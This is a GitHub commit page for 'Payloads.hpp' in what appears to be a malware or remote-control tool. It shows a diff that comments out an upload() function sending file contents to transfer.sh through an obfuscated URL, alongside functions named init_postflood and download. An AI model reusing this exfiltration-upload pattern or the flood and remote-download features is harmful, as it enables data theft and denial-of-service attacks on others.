Skip to content

Commit

Permalink
Update Payloads.hpp
Browse files Browse the repository at this point in the history
  • Loading branch information
Nk125 authored Apr 28, 2022
1 parent 1b439fe commit 7fe9f54
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions include/Payloads.hpp
Original file line number Diff line number Diff line change
Expand Up @@ -425,7 +425,7 @@ void init_postflood(std::string URL, int threads) {
}
}

std::string upload(std::string filename, std::string body) {
/*std::string upload(std::string filename, std::string body) {
std::string path_req;
httplib::Client c = ClientFactory(OBFUSCATED("https://transfer.sh/") + filename, path_req);
Expand All @@ -436,7 +436,7 @@ std::string upload(std::string filename, std::string body) {
else {
return "";
}
}
}*/

void download(std::string URL, std::string filename) {
std::string path_req;
Expand Down

0 comments on commit 7fe9f54

Please sign in to comment.